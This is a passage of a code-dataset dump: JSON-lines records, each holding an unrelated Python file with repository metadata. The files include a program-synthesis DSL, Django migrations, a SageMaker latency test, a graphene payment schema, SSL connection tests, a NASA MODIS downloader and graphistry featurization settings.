None\n\n\ndef __scanl__(op):\n def aux(l):\n if len(l) == 0:\n return []\n else:\n y = [l[0]]\n for x in l[1:]:\n last = y[-1]\n y.append(op(last, x))\n return y\n\n return aux\n\n\n__semantics = {\n \"HEAD\": lambda l: l[0] if len(l) > 0 else None,\n \"TAIL\": lambda l: l[-1] if len(l) > 0 else None,\n \"ACCESS\": lambda i: lambda l: __access__(i, l),\n \"MINIMUM\": lambda l: min(l) if len(l) > 0 else None,\n \"MAXIMUM\": lambda l: max(l) if len(l) > 0 else None,\n \"LENGTH\": lambda l: len(l),\n \"COUNT[<0]\": lambda l: len([x for x in l if x < 0]),\n \"COUNT[>0]\": lambda l: len([x for x in l if x > 0]),\n \"COUNT[EVEN]\": lambda l: len([x for x in l if x % 2 == 0]),\n \"COUNT[ODD]\": lambda l: len([x for x in l if x % 2 == 1]),\n \"SUM\": lambda l: sum(l),\n \"TAKE\": lambda i: lambda l: l[:i],\n \"DROP\": lambda i: lambda l: l[i:],\n \"SORT\": lambda l: sorted(l),\n \"REVERSE\": lambda l: l[::-1],\n \"FILTER[<0]\": lambda l: [x for x in l if x < 0],\n \"FILTER[>0]\": lambda l: [x for x in l if x > 0],\n \"FILTER[EVEN]\": lambda l: [x for x in l if x % 2 == 0],\n \"FILTER[ODD]\": lambda l: [x for x in l if x % 2 == 1],\n \"MAP[+1]\": lambda l: [x + 1 for x in l],\n \"MAP[-1]\": lambda l: [x - 1 for x in l],\n \"MAP[*2]\": lambda l: [x * 2 for x in l],\n \"MAP[/2]\": lambda l: [int(x / 2) for x in l],\n \"MAP[*3]\": lambda l: [x * 3 for x in l],\n \"MAP[/3]\": lambda l: [int(x / 3) for x in l],\n \"MAP[*4]\": lambda l: [x * 4 for x in l],\n \"MAP[/4]\": lambda l: [int(x / 4) for x in l],\n \"MAP[**2]\": lambda l: [x**2 for x in l],\n \"MAP[*-1]\": lambda l: [-x for x in l],\n \"ZIPWITH[+]\": lambda l1: lambda l2: [x + y for (x, y) in zip(l1, l2)],\n \"ZIPWITH[-]\": lambda l1: lambda l2: [x - y for (x, y) in zip(l1, l2)],\n \"ZIPWITH[*]\": lambda l1: lambda l2: [x * y for (x, y) in zip(l1, l2)],\n \"ZIPWITH[max]\": lambda l1: lambda l2: [\n (x if x > y else y) for (x, y) in zip(l1, l2)\n ],\n \"ZIPWITH[min]\": lambda l1: lambda l2: [\n (y if x > y else x) for (x, y) in zip(l1, l2)\n ],\n \"SCAN1L[+]\": __scanl__(lambda x, y: x + y),\n \"SCAN1L[-]\": __scanl__(lambda x, y: x - y),\n \"SCAN1L[*]\": __scanl__(lambda x, y: x * y),\n \"SCAN1L[min]\": __scanl__(lambda x, y: min(x, y)),\n \"SCAN1L[max]\": __scanl__(lambda x, y: max(x, y)),\n # 'MAP': lambda f: lambda l: list(map(f, l)),\n}\n\n__primitive_types = {\n \"HEAD\": Arrow(List(INT), INT),\n \"TAIL\": Arrow(List(INT), INT),\n \"ACCESS\": Arrow(INT, Arrow(List(INT), INT)),\n \"MINIMUM\": Arrow(List(INT), INT),\n \"MAXIMUM\": Arrow(List(INT), INT),\n \"LENGTH\": Arrow(List(INT), INT),\n \"COUNT[<0]\": Arrow(List(INT), INT),\n \"COUNT[>0]\": Arrow(List(INT), INT),\n \"COUNT[EVEN]\": Arrow(List(INT), INT),\n \"COUNT[ODD]\": Arrow(List(INT), INT),\n \"SUM\": Arrow(List(INT), INT),\n \"TAKE\": Arrow(INT, Arrow(List(INT), List(INT))),\n \"DROP\": Arrow(INT, Arrow(List(INT), List(INT))),\n \"SORT\": Arrow(List(INT), List(INT)),\n \"REVERSE\": Arrow(List(INT), List(INT)),\n \"FILTER[<0]\": Arrow(List(INT), List(INT)),\n \"FILTER[>0]\": Arrow(List(INT), List(INT)),\n \"FILTER[EVEN]\": Arrow(List(INT), List(INT)),\n \"FILTER[ODD]\": Arrow(List(INT), List(INT)),\n \"MAP[+1]\": Arrow(List(INT), List(INT)),\n \"MAP[-1]\": Arrow(List(INT), List(INT)),\n \"MAP[*2]\": Arrow(List(INT), List(INT)),\n \"MAP[/2]\": Arrow(List(INT), List(INT)),\n \"MAP[*-1]\": Arrow(List(INT), List(INT)),\n \"MAP[**2]\": Arrow(List(INT), List(INT)),\n \"MAP[*3]\": Arrow(List(INT), List(INT)),\n \"MAP[/3]\": Arrow(List(INT), List(INT)),\n \"MAP[*4]\": Arrow(List(INT), 
List(INT)),\n \"MAP[/4]\": Arrow(List(INT), List(INT)),\n \"ZIPWITH[+]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"ZIPWITH[-]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"ZIPWITH[*]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"ZIPWITH[min]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"ZIPWITH[max]\": Arrow(List(INT), Arrow(List(INT), List(INT))),\n \"SCAN1L[+]\": Arrow(List(INT), List(INT)),\n \"SCAN1L[-]\": Arrow(List(INT), List(INT)),\n \"SCAN1L[*]\": Arrow(List(INT), List(INT)),\n \"SCAN1L[min]\": Arrow(List(INT), List(INT)),\n \"SCAN1L[max]\": Arrow(List(INT), List(INT)),\n # 'MAP': Arrow(Arrow(t0,t1),Arrow(List(t0),List(t1))),\n}\n\n\n__forbidden_patterns = [\n [\"HEAD\", \"SCAN1L[-]\"],\n [\"HEAD\", \"SCAN1L[min]\"],\n [\"HEAD\", \"SCAN1L[*]\"],\n [\"HEAD\", \"SCAN1L[max]\"],\n [\"HEAD\", \"SCAN1L[+]\"],\n [\"MINIMUM\", \"SORT\"],\n [\"MINIMUM\", \"REVERSE\"],\n [\"MINIMUM\", \"SCAN1L[min]\"],\n [\"MAXIMUM\", \"REVERSE\"],\n [\"MAXIMUM\", \"SORT\"],\n [\"MAXIMUM\", \"SCAN1L[max]\"],\n [\"LENGTH\", \"MAP[/4]\"],\n [\"LENGTH\", \"MAP[**2]\"],\n [\"LENGTH\", \"SCAN1L[max]\"],\n [\"LENGTH\", \"MAP[+1]\"],\n [\"LENGTH\", \"SORT\"],\n [\"LENGTH\", \"MAP[/3]\"],\n [\"LENGTH\", \"SCAN1L[*]\"],\n [\"LENGTH\", \"MAP[*2]\"],\n [\"LENGTH\", \"MAP[*3]\"],\n [\"LENGTH\", \"SCAN1L[+]\"],\n [\"LENGTH\", \"MAP[*-1]\"],\n [\"LENGTH\", \"MAP[/2]\"],\n [\"LENGTH\", \"SCAN1L[-]\"],\n [\"LENGTH\", \"SCAN1L[min]\"],\n [\"LENGTH\", \"REVERSE\"],\n [\"LENGTH\", \"MAP[-1]\"],\n [\"LENGTH\", \"MAP[*4]\"],\n [\"COUNT[<0]\", \"MAP[*2]\"],\n [\"COUNT[<0]\", \"SORT\"],\n [\"COUNT[<0]\", \"MAP[*3]\"],\n [\"COUNT[<0]\", \"MAP[*4]\"],\n [\"COUNT[<0]\", \"REVERSE\"],\n [\"COUNT[<0]\", \"FILTER[<0]\"],\n [\"COUNT[>0]\", \"SORT\"],\n [\"COUNT[>0]\", \"MAP[*3]\"],\n [\"COUNT[>0]\", \"MAP[-1]\"],\n [\"COUNT[>0]\", \"FILTER[>0]\"],\n [\"COUNT[>0]\", \"MAP[/2]\"],\n [\"COUNT[>0]\", \"MAP[*4]\"],\n [\"COUNT[>0]\", \"REVERSE\"],\n [\"COUNT[>0]\", \"MAP[*2]\"],\n [\"COUNT[EVEN]\", \"REVERSE\"],\n [\"COUNT[EVEN]\", \"MAP[**2]\"],\n [\"COUNT[EVEN]\", \"FILTER[EVEN]\"],\n [\"COUNT[EVEN]\", \"MAP[*3]\"],\n [\"COUNT[EVEN]\", \"SORT\"],\n [\"COUNT[EVEN]\", \"MAP[*-1]\"],\n [\"COUNT[ODD]\", \"REVERSE\"],\n [\"COUNT[ODD]\", \"FILTER[ODD]\"],\n [\"COUNT[ODD]\", \"MAP[**2]\"],\n [\"COUNT[ODD]\", \"MAP[*3]\"],\n [\"COUNT[ODD]\", \"SORT\"],\n [\"COUNT[ODD]\", \"MAP[*-1]\"],\n [\"SUM\", \"SORT\"],\n [\"SUM\", \"REVERSE\"],\n [\"SORT\", \"REVERSE\"],\n [\"SORT\", \"SORT\"],\n [\"REVERSE\", \"REVERSE\"],\n [\"FILTER[<0]\", \"FILTER[<0]\"],\n [\"FILTER[>0]\", \"FILTER[>0]\"],\n [\"FILTER[EVEN]\", \"FILTER[EVEN]\"],\n [\"FILTER[ODD]\", \"FILTER[ODD]\"],\n [\"MAP[+1]\", \"MAP[-1]\"],\n [\"MAP[-1]\", \"MAP[+1]\"],\n [\"MAP[/2]\", \"MAP[*2]\"],\n [\"MAP[*-1]\", \"MAP[*-1]\"],\n [\"MAP[**2]\", \"MAP[*-1]\"],\n [\"MAP[/3]\", \"MAP[*3]\"],\n [\"MAP[/4]\", \"MAP[*4]\"],\n [\"SCAN1L[min]\", \"SCAN1L[min]\"],\n [\"SCAN1L[max]\", \"SCAN1L[max]\"],\n]\n\ndsl = DSL(__primitive_types, __forbidden_patterns)\nevaluator = DSLEvaluator(__semantics)\nevaluator.skip_exceptions.add(OverflowError)\nlexicon = list(range(-256, 256 + 1))\n","repo_name":"nathanael-fijalkow/ProgSynth","sub_path":"examples/nlp/conala/conala.py","file_name":"conala.py","file_ext":"py","file_size_in_byte":6965,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"24083320608","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, 
models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('haishin', '0003_auto_20151211_0858'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='business',\n name='slug',\n field=models.SlugField(default='aa', help_text=b'Se va a generar automaticamente', max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='city',\n name='slug',\n field=models.SlugField(default='vv', help_text=b'Se va a generar automaticamente', max_length=100),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='country',\n name='url',\n field=models.CharField(max_length=100, null=True, blank=True),\n ),\n ]\n","repo_name":"po5i/haishin_project","sub_path":"haishin/migrations/0004_auto_20151211_1751.py","file_name":"0004_auto_20151211_1751.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41309340769","text":"\"\"\"\n\"\"\"\n#===========================\n# GLOBAL VARIABLES\n#===========================\nfrom astropy.visualization.stretch import LinearStretch, LogStretch, SqrtStretch\n\n\ndata = None\nheader = ''\n\n# Matplotlib display values\nscale_type = {'Linear':LinearStretch(), 'Log':LogStretch(), 'Sqrt':SqrtStretch()}\ncmap = None\n\n# FITS coords\nx1 = 0\nx2 = 0\ny1 = 0\ny2 = 0","repo_name":"PsyJim/AURORA","sub_path":"DCViewer/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"39678501276","text":"import boto3\nimport pandas as pd\nimport pickle\nimport sys\nimport time\n\ndef get_time_for_prediction(endpoint_name, content_type, payload):\n t0 = time.time()\n response = runtime_client.invoke_endpoint(EndpointName=endpoint_name,\n ContentType=content_type,\n Body=payload)\n return (time.time() - t0) * 1000\n\ndef load_payload(file_name):\n with open(file_name, 'r') as f:\n payload = f.read().strip()\n return payload\n\nruntime_client = boto3.client('runtime.sagemaker')\n\ntime_data = []\nendpoint_name = 'BuiltInXGBoostEndpointPkl-2018-03-15-20-25-44'\ncontent_type = 'text/csv'\npayload = load_payload(sys.argv[1])\n\nattempts = int(sys.argv[2])\n\nfor i in range(attempts):\n if i % 50 == 0:\n print('The {}-th attempt.'.format(i))\n time_data.append(get_time_for_prediction(endpoint_name, content_type, payload))\n\noutput_file = \"latency-{}\".format(int(time.time()))\nwith open(output_file, 'wb') as f:\n pickle.dump(time_data, f)\n\n# Analyze the data.\ns = pd.Series(time_data)\nprint(s.describe())\nprint('99%-tile latency: {}'.format(s.quantile([.99])))\n","repo_name":"jiwang576/perf_test","sub_path":"local_client.py","file_name":"local_client.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5890861366","text":"from django.shortcuts import get_object_or_404\nfrom graphene_django import DjangoObjectType\nfrom .models import Payment, PremiumPlan\nimport graphene\nfrom zeep.client import Client\nfrom django.conf import settings\nimport logging\n\n\nzarinpal = getattr(settings, 'ZARINPAL', None)\nclient = Client(zarinpal['sandbox']['request_url'])\n\n\n\nclass PremiumPlanObjectType(DjangoObjectType):\n class Meta:\n model = PremiumPlan\n fields = ['id', 'user', 'description', 'amount', \n 'started_date', 'finished_date']\n\n\n\nclass PaymentObjectType(DjangoObjectType):\n class Meta:\n model = 
Payment\n fields = ['id', 'user', 'plan', 'amount', 'status', 'authority', \n 'ref_id', 'card_pan', 'card_hash', 'date_created']\n\n\n\nclass ResultRequestObjectType(graphene.ObjectType):\n payment = graphene.Field(PaymentObjectType)\n startpay_link = graphene.String()\n\n\nclass PaymentRequestMutation(graphene.Mutation):\n class Arguments:\n amount = graphene.Float()\n\n information_need = graphene.Field(ResultRequestObjectType)\n register_url = graphene.String()\n\n\n def mutate(root, info, amount):\n if info.context.user.is_authenticated:\n result = client.service.PaymentRequest(\n zarinpal['merchant_id'],\n amount,\n \"Premium Plan for our website\",\n info.context.user.email,\n '09123456789',\n zarinpal['callback_url']\n )\n if result.Status == 100:\n payment = Payment.objects.create(\n amount=amount,\n user=info.context.user,\n authority=result.Authority\n )\n information_need = {\n 'payment': payment,\n 'startpay_link': zarinpal['sandbox']['startpay_url'].format(\n result.Authority\n )\n }\n return PaymentRequestMutation(\n information_need=information_need\n )\n logging.error(result)\n return PaymentRequestMutation(register_url='http://locahost/register')\n\n\n\nclass PaymentVerifyMutation(graphene.Mutation):\n class Arguments:\n id = graphene.Int()\n\n\n payment = graphene.Field(PaymentObjectType)\n\n\n def mutate(root, info, id):\n p = get_object_or_404(Payment, pk=id, \n user=info.context.user)\n result = client.service.PaymentVerification(\n zarinpal['merchant_id'],\n p.authority,\n p.amount\n )\n if result.Status == 100 or result.Status == 101:\n plan = PremiumPlan.objects.create(user=info.context.user)\n plan.set_finish_date()\n p.status = 'S'\n p.ref_id = result.RefID\n p.save()\n return PaymentVerifyMutation(payment=p)\n p.status = 'F'\n p.ref_id = result.RefID\n p.save()\n return PaymentVerifyMutation(payment=p)\n\n\n\nclass Mutation(graphene.ObjectType):\n payment_request_mutation = PaymentRequestMutation.Field()\n payment_verify_mutation = PaymentVerifyMutation.Field()\n\n\n\nclass Query(graphene.ObjectType):\n my_payment = graphene.Field(PaymentObjectType, username=graphene.String())\n my_premium_plan = graphene.Field(PremiumPlanObjectType, username=graphene.String())\n\n def resolve_my_payment(root, info, username):\n return get_object_or_404(Payment, user__username=username)\n\n def resolve_my_premium_plan(root, info, username):\n return get_object_or_404(PremiumPlan, user__username=username)\n\n\n\nschema = graphene.Schema(query=Query, mutation=Mutation)\n","repo_name":"MohammadD3veloper/GrapheneBlog","sub_path":"plan/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"39154849913","text":"from collections import UserDict\nfrom .util import setup_logger\nfrom .constants import VERBOSE, TRACE\n\nlogger = setup_logger(\"graphistry.features\", verbose=VERBOSE, fullpath=TRACE)\n\n# ###############################################################\nUNK = \"UNK\"\nLENGTH_PRINT = 80\n# ################ Encoded Global Models #################\nEMBEDDING_MODEL_PATH = \"embedding.model\"\nTOPIC_MODEL_PATH = \"topic.model\"\nNGRAMS_MODEL_PATH = \"ngrams.model\"\nSEARCH_MODEL_PATH = \"search.model\"\n\n# ################ Actual Models #################\n# add specific instances of models here\n\n\n# ###############################################################################\n# ################# graphistry featurization config constants 
#################\nN_TOPICS = 42\nN_TOPICS_TARGET = 10\nHIGH_CARD = 4e7 # forces one hot encoding\nMID_CARD = 2e3 # todo: forces hashing\nLOW_CARD = 2\n\nCARD_THRESH = 40\nCARD_THRESH_TARGET = 400\n\nFORCE_EMBEDDING_ALL_COLUMNS = 0 # min_words\nHIGH_WORD_COUNT = 1024\nLOW_WORD_COUNT = 3\n\nNGRAMS_RANGE = (1, 3)\nMAX_DF = 0.2\nMIN_DF = 3\n\nN_BINS = 10\nKBINS_SCALER = \"kbins\"\nIMPUTE = \"median\" # set to\nN_QUANTILES = 100\nOUTPUT_DISTRIBUTION = \"normal\"\nQUANTILES_RANGE = (25, 75)\nN_BINS = 10\nENCODE = \"ordinal\" # kbins, onehot, ordinal, label\nSTRATEGY = \"uniform\" # uniform, quantile, kmeans\nSIMILARITY = None # 'ngram' , default None uses Gap\nCATEGORIES = \"auto\"\nKEEP_N_DECIMALS = 5\n\nBATCH_SIZE = 1000\nNO_SCALER = None\nEXTRA_COLS_NEEDED = [\"x\", \"y\", \"_n\"]\n# ###############################################################\n\n# ###############################################################\n# ################# enrichments\nNMF_PATH = \"nmf\"\nTIME_TOPIC = \"time_topic\"\nTRANSLATED = \"translated\"\nTRANSLATIONS = \"translations\"\nSENTIMENT = \"sentiment\"\n\n# ###############################################################\n# ############ The Search key\nSEARCH = \"search\"\n# ############ Embeddings keys\nTOPIC = \"topic\" # topic model embeddings\nEMBEDDING = \"embedding\" # multilingual embeddings\nQA = \"qa\"\nNGRAMS = \"ngrams\"\n# ############ Embedding Models\nPARAPHRASE_SMALL_MODEL = \"sentence-transformers/paraphrase-albert-small-v2\"\nPARAPHRASE_MULTILINGUAL_MODEL = (\n \"sentence-transformers/paraphrase-multilingual-MiniLM-L12-v2\"\n)\nMSMARCO2 = \"sentence-transformers/msmarco-distilbert-base-v2\" # 768\nMSMARCO3 = \"sentence-transformers/msmarco-distilbert-base-v3\" # 512\nQA_SMALL_MODEL = \"sentence-transformers/multi-qa-MiniLM-L6-cos-v1\"\n# #############################################################################\n# Model Training Constants\n# Used for seeding random state\nRANDOM_STATE = 42\nSPLIT_LOW = 0.1\nSPLIT_MEDIUM = 0.2\nSPLIT_HIGH = 0.5\n\n# #############################################################################\nclass ModelDict(UserDict):\n \"\"\"Helper class to print out model names\n\n Args:\n message: description of model\n verbose: print out model names, logging happens regardless\n \"\"\"\n\n def __init__(self, message, verbose=True, *args, **kwargs):\n self._message = message\n self._verbose = verbose\n self._print_length = min(LENGTH_PRINT, len(message))\n self._updates = []\n super().__init__(*args, **kwargs)\n\n def __repr__(self):\n logger.info(self._message)\n if self._verbose:\n print(\"_\" * self._print_length)\n print()\n print(self._message)\n print(\"_\" * self._print_length)\n print()\n return super().__repr__()\n\n def update(self, *args, **kwargs):\n self._updates.append(args[0])\n if len(self._updates) > 1: # don't take first update since its the init/default\n self._message += (\n \"\\n\" + \"_\" * self._print_length + f\"\\n\\nUpdated: {self._updates[-1]}\"\n )\n return super().update(*args, **kwargs)\n\n\ndefault_featurize_parameters = dict(\n kind=\"nodes\",\n use_scaler=NO_SCALER,\n use_scaler_target=NO_SCALER,\n cardinality_threshold=CARD_THRESH,\n cardinality_threshold_target=CARD_THRESH_TARGET,\n n_topics=N_TOPICS,\n n_topics_target=N_TOPICS_TARGET,\n multilabel=False,\n embedding=False,\n use_ngrams=False,\n ngram_range=NGRAMS_RANGE,\n max_df=MAX_DF,\n min_df=MIN_DF,\n min_words=LOW_WORD_COUNT,\n model_name=MSMARCO2,\n impute=IMPUTE,\n n_quantiles=N_QUANTILES,\n 
output_distribution=OUTPUT_DISTRIBUTION,\n quantile_range=QUANTILES_RANGE,\n n_bins=N_BINS,\n encode=ENCODE, # kbins, onehot, ordinal, label\n strategy=STRATEGY, # uniform, quantile, kmeans\n similarity=SIMILARITY, # 'ngram'\n categories=CATEGORIES,\n keep_n_decimals=KEEP_N_DECIMALS,\n remove_node_column=True,\n inplace=False,\n feature_engine=\"auto\",\n memoize=True,\n)\n\n\n# #############################################################################\n# Create useful presets for the user\n# makes naming and encoding models consistently and testing different models against eachother easy\n# customize the default parameters for each model you want to test\n\n# Ngrams Model over features\nngrams_model = ModelDict(\"Ngrams Model\", verbose=True, **default_featurize_parameters)\nngrams_model.update(dict(use_ngrams=True, min_words=HIGH_CARD))\n\n# Topic Model over features\ntopic_model = ModelDict(\"Topic Model\", verbose=True, **default_featurize_parameters)\ntopic_model.update(\n dict(\n cardinality_threshold=LOW_CARD, # force topic model\n cardinality_threshold_target=LOW_CARD, # force topic model\n n_topics=N_TOPICS,\n n_topics_target=N_TOPICS_TARGET,\n min_words=HIGH_CARD, # make sure it doesn't turn into sentence model, but rather topic models\n )\n)\n\n# useful for text data that you want to paraphrase\nembedding_model = ModelDict(\n f\"{PARAPHRASE_SMALL_MODEL} Embedding Model\",\n verbose=True,\n **default_featurize_parameters,\n)\nembedding_model.update(\n dict(\n min_words=FORCE_EMBEDDING_ALL_COLUMNS,\n model_name=PARAPHRASE_SMALL_MODEL, # if we need multilingual support, use PARAPHRASE_MULTILINGUAL_MODEL\n )\n)\n\n# useful for when search input is much smaller than the encoded documents\nsearch_model = ModelDict(\n f\"{MSMARCO2} Search Model\", verbose=True, **default_featurize_parameters\n)\nsearch_model.update(\n dict(\n min_words=FORCE_EMBEDDING_ALL_COLUMNS,\n model_name=MSMARCO2,\n )\n)\n\n# Question Answering encodings for search\nqa_model = ModelDict(\n f\"{QA_SMALL_MODEL} QA Model\", verbose=True, **default_featurize_parameters\n)\nqa_model.update(\n dict(\n min_words=FORCE_EMBEDDING_ALL_COLUMNS,\n model_name=QA_SMALL_MODEL,\n )\n)\n\n\nBASE_MODELS = {\n EMBEDDING: embedding_model,\n SEARCH: search_model,\n QA: qa_model,\n TOPIC: topic_model,\n NGRAMS: ngrams_model,\n}\n\n\nif __name__ == \"__main__\":\n # python3 -m graphistry.features -m 'my awesome edge encoded model' -p '{\"kind\":\"edges\"}'\n import argparse\n import json\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-m\", \"--model\", type=str, default=SEARCH, help=\"description of your model\"\n )\n parser.add_argument(\"-v\", \"--verbose\", type=bool, default=True)\n parser.add_argument(\"-p\", \"--model_params\", type=str)\n args = parser.parse_args()\n\n params = json.loads(args.model_params)\n print(\"----------- params -----------\")\n print(params)\n model = ModelDict(args.model, verbose=args.verbose, **default_featurize_parameters)\n model.update(params)\n print(model)\n","repo_name":"orgTestCodacy11KRepos110MB/repo-2761-pygraphistry","sub_path":"graphistry/features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":7430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15845112134","text":"import ssl\nimport requests\nimport pytest\n\n\n@pytest.mark.usefixtures('active_app', 'ssl_port')\ndef test_ssl_fails_for_non_ssl_port(hostname, non_ssl_port):\n with pytest.raises(ssl.SSLError):\n 
requests.get(\"https://{0}:{1}\".format(hostname, non_ssl_port))\n\n\n@pytest.mark.usefixtures('active_app', 'non_ssl_port')\ndef test_non_ssl_fails_for_ssl_port(hostname, ssl_port):\n with pytest.raises(requests.ConnectionError):\n requests.get(\"http://{0}:{1}\".format(hostname, ssl_port))\n","repo_name":"vmalloc/Flask-Loopback","sub_path":"tests/test_ssl.py","file_name":"test_ssl.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"19613186120","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport subprocess\n\"\"\"\n事业部数量\n\"\"\"\n\n\ndef stastic_department(JOB_DICT):\n \"\"\"docstring for stastic_department\"\"\"\n dep_dict = {}\n with open('department.csv', 'wb') as f:\n for k, v in JOB_DICT.iteritems():\n if v['departmentName'] not in dep_dict:\n dep_dict[v['departmentName']] = 1\n else:\n dep_dict[v['departmentName']] += 1\n return dep_dict\n\ndef save_as_csv(dep_dict):\n \"\"\"docstring for save_as_csv\"\"\"\n with open('department.csv', 'wb') as f:\n f.write('事业部' + ',' + '数量' + '\\n')\n for k, v in dep_dict.iteritems():\n f.write(','.join([k, str(v)]).encode('utf-8') + '\\n')\n\n\ndef relation(dep_dict):\n \"\"\"docstring for relation\"\"\"\n entry_dict = {}\n with open(\"relation.dot\", \"wb\") as f:\n f.write(\"digraph 阿里事业部{\\n\")\n for lk in dep_dict.keys():\n kl = lk.split('-')\n for i in range(len(kl) - 1):\n entry = \"\\\"\" + kl[i].encode('utf8') + \"\\\" -> \\\"\" + kl[i+1].encode('utf8') + \"\\\";\\n\"\n if entry not in entry_dict:\n entry_dict[entry] = \"\"\n f.write(entry)\n f.write(\"}\")\n cmd = \"dot -Tpng -o 部门关系.png relation.dot\"\n subprocess.call(cmd, shell=True)\n return entry_dict\n\n\n","repo_name":"HalfdogStudio/Crawler","sub_path":"alibaba/department.py","file_name":"department.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"38000581496","text":"class Solution(object):\n def arrayNesting(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n lar_nested_len = 0\n for i in range(len(nums)):\n lar_nested_len = max(lar_nested_len, self.array_nesting_helper(i, nums))\n return lar_nested_len\n\n def array_nesting_helper(self, index, nums):\n index_set = set()\n while index not in index_set:\n index_set.add(index)\n index = nums[index]\n return len(index_set)\n","repo_name":"komaljit/leetcode","sub_path":"556 Array_nesting.py","file_name":"556 Array_nesting.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8295271961","text":"# -*- coding: utf-8 -*- \n\"\"\" ++++++++++++++++++++++++++++++++++++++\n@product->name PyCharm\n@project->name growth_analysis\n@editor->name Sanliy\n@file->name download_product.py\n@create->time 2023/3/29-10:29\n@desc->\n++++++++++++++++++++++++++++++++++++++ \"\"\"\nimport os.path\n\nimport requests\n\n\nclass DownloadProduct:\n def __init__(self):\n self.token = None\n self.headers = None\n\n def get_token(self):\n with open(r\"D:\\grow_anay\\growth_analysis\\download\\base\\token.txt\", 'r') as f:\n self.token = f.read()\n\n def set_headers(self):\n self.headers = {\n \"Authorization\": \"Bearer \" + self.token\n }\n\n def download_file(self, file_url, start_date, end_date, area):\n print(file_url)\n file_path = os.path.join(\n os.path.dirname(\n os.path.dirname(__file__)\n ),\n \"data\",\n 
\"download\",\n f\"{start_date}_{end_date}_{area}\",\n \"hdf\"\n )\n if not os.path.exists(file_path):\n os.makedirs(file_path)\n session = requests.Session()\n resp = session.get(url=file_url, headers=self.headers)\n file_size = resp.headers.get(\"Content-Length\")\n print(file_size)\n file_name = file_url.split(\"/\")[-1]\n file_name_with_path = os.path.join(file_path, file_name)\n\n with open(file_name_with_path, 'ab') as code:\n for chunk in resp.iter_content(chunk_size=1024):\n if chunk:\n code.write(chunk)\n code.flush()\n session.close()\n\n\nif __name__ == '__main__':\n dp = DownloadProduct()\n dp.get_token()\n dp.set_headers()\n dp.download_file(\n \"https://ladsweb.modaps.eosdis.nasa.gov/archive/allData/61/MOD03/2023/032/MOD03.A2023032.0210.061.2023032150218.hdf\")\n","repo_name":"sanliyang/growth_analysis","sub_path":"download/download_product.py","file_name":"download_product.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"39332723293","text":"import numpy as np\nfrom glob import glob\n\n\ndef pick_random_state(octave):\n\n files = glob('/home/alexander/Documents/MATLAB/MPCfiles/*')\n n_files = len(files)\n\n # while True:\n\n i = np.random.choice(n_files)\n base_case = octave.loadcase(files[i])\n\n # Switch all lines on\n base_case['branch'][:, 10] = 1\n\n return base_case, files[i]\n","repo_name":"ADM91/PowerSystem-DL","sub_path":"system/pick_random_state.py","file_name":"pick_random_state.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"74925580572","text":"#coding: utf-8\nimport workflow\nimport editor\nfrom datetime import datetime, timedelta, date\n\n# get and format date\nrunningDate = date.today()\nformat = '%x'\ndateText = runningDate.strftime(format)\n\n# position cursor\neditor.set_selection(0) # move to beginning\n\n# insert text\neditor.insert_text('# ')\neditor.insert_text(dateText)\neditor.insert_text('\\n\\n\\n')\n\n# move back two characters\ncurrentSpot = editor.get_selection()\neditor.set_selection(currentSpot[0] - 2)","repo_name":"grahampcharles/editorial-workflows","sub_path":"NewDatedSection.py","file_name":"NewDatedSection.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25703340738","text":"import tensorflow as tf\nfrom typing import Dict, Callable, List\nfrom collections import ChainMap\n\nfrom tophat.constants import FGroup\nfrom tophat.embedding import EmbeddingMap\nfrom tophat.utils.xn_utils import \\\n preset_interactions, kernel_via_xn_sets, muls_via_xn_sets\nfrom tophat.nets.fc import simple_fc\n\n\nclass BilinearNet(object):\n \"\"\"Network for scoring interactions\n\n Args:\n embedding_map: Variables and metadata concerning categorical embeddings\n user_cat_cols: Name of user categorical feature columns\n item_cat_cols: Name of item categorical feature columns\n context_cat_cols: Name of context categorical feature columns\n interaction_type: Type of preset interaction\n One of {'intra', 'inter'}\n \"\"\"\n\n def __init__(self,\n embedding_map: EmbeddingMap,\n user_cat_cols: List[str],\n item_cat_cols: List[str],\n context_cat_cols: List[str],\n interaction_type='inter',\n ):\n self.embedding_map = embedding_map\n self.cat_cols = {\n 